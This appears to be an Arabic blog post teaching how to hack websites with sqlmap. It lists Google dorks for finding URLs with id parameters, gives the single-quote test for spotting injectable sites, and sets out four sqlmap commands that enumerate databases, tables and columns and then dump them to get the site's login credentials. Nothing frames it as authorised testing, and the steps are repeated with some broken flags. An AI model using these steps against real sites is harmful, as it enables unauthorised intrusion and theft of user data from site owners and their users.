اداه sqlmap لاختراق المواقع
الخطوة الأولى:
python2 sqlmap.py -u (websaite) --dbs s-- level=3 --risk=3 --batch
_________________________________________
الخطوة الثانية:
python2 sqlmap.py -u (website) -D (name_dataase) --tables --level=3 --risk=3 --batch
__________________________________________
الخطوة الثالثة:
python2 sqlmap.py -u (websit) -D (NAME_database) -T (name_table) --columns --level=3 --risk=3 --batch
__________________________________________
الخطوة الرابعة والأخيرة :
python2 sqlmap.py -u (websit) -D (NAME_database) -T (NAME_table) -C (NAME_column) --dump --level=3 --risk=3 --batch
----------------------------------------------------------------
ملاحظة: مكان كلمة ( (websit) تضع رابط الموقع
ومكان كلمة (datsbases) تنسخ الاسم الذي يظهر في قائمة database وعند اكمال جميع الخطوات سيتم اظهار الاسم والكلمة الخاصة بالموقع وينم الاختراق بنجاح
- تعريفها : هي أداة مخصصة لأختراق المواقع المصابة يثغرة SQL اي يمكن أختراقها عن طريق هذه الأداة ..
- الأوامر :
- git clone https://github.com/sqlmapproject/sqlmap
- cd sqlmap
- ls
- chmod +x sqlmap.py
- pyhthon2 sqlmap.py
- عندما تفتح الاداة تحتاج اولا الى دوركات اي الى نهايات الموقع ..
- اي عندما تخترق هذا النوع من المواقع يجب ان تكون نهايته على الشكل التالي وتسمى دوركات(Dork) :
- دوركات:
- Dork
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- "page.php?id="
- "trainers.php?id="
- "article.php?ID="
- "games.php?id="
- "newsDetail.php?id="
- "staff.php?id="
- "products.php?id="
- "news_view.php?id="
- "opinions.php?id="
- "pages.php?id="
- "prod_detail.php?id="
- لأيجاد موقع مصاب يجب عليك ان تنسخ احد الدوركات وتكتبه في بحث Google وستظهر عدة مواقع ..لتعرف اي واحدة منها مصابة يجب ان تنسخ رابط الموقع وتكتب بعده هذه النقطة( ’ ) اذا ظهرت لك رسالة ما او شاشة بيضاء فيها كتابة على شكل مشفر فيكون هنا النوقع مصاب ...
- لبدء الأختراق:
- تنسخ رابط الموقع المراد اختراقه ..وتكتب هذه الاوامر ...
الخطوة الأولى:
python2 sqlmap.py -u (websaite) --dbs s-- level=3 --risk=3 --batch
_________________________________________
الخطوة الثانية:
python2 sqlmap.py -u (website) -D (name_dataase) --tables --level=3 --risk=3 --batch
__________________________________________
الخطوة الثالثة:
python2 sqlmap.py -u (websit) -D (NAME_database) -T (name_table) --columns --level=3 --risk=3 --batch
__________________________________________
الخطوة الرابعة والأخيرة :
python2 sqlmap.py -u (websit) -D (NAME_database) -T (NAME_table) -C (NAME_column) --dump --level=3 --risk=3 --batch
----------------------------------------------------------------
ملاحظة: مكان كلمة ( (websit) تضع رابط الموقع
ومكان كلمة (datsbases) تنسخ الاسم الذي يظهر في قائمة database وعند اكمال جميع الخطوات سيتم اظهار الاسم والكلمة الخاصة بالموقع وينم الاختراق بنجاح
إرسال تعليق